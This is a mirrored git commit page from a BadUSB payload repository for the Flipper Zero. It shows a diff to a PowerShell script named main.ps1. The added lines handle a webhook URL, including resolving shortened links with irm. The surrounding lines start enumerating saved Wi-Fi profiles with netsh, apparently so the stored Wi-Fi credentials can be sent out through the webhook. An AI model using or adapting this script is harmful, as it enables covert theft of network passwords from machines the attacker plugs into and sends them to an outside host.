mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-29 14:13:24 -08:00
Update main.ps1
This commit is contained in:
@@ -1,4 +1,7 @@
|
||||
$whuri = "$dc"
|
||||
# shortened URL Detection
|
||||
if ($whuri.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $whuri = (irm $whuri).url}
|
||||
|
||||
$outfile=""
|
||||
$a=0
|
||||
$ws=(netsh wlan show profiles) -replace ".*:\s+"
|
||||
|
||||
Reference in New Issue
Block a user